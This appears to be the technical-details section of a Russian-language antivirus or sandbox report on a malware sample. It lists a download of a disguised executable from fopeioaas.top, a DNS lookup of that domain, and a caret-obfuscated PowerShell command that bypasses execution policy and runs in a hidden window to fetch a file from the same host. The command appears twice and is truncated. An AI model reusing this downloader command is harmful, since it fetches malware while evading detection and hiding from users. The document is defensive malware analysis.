Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^erS^HELl^.^eXe ^-ex^E^cu^TiO^n^pOlicY bYPA^Ss^ -NOPROFIle^ -^WinDoWS^t^y^le H^id^d^eN^ (^new^-Ob^j^ec^T Syst^e^m.N^E^T^.WEbCLi^E^NT^).DoW^NloaDfi^le('http://www.fopeioaas.top...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "pOW^erS^HELl^.^eXe ^-ex^E^cu^TiO^n^pOlicY bYPA^Ss^ -NOPROFIle^ -^WinDoWS^t^y^le H^id^d^eN^ (^new^-Ob^j^ec^T Syst^e^m.N^E^T^.WEbCLi^E^NT^).DoW^NloaDfi^le('http://www.fopeioaas.top...' (со скрытым окном)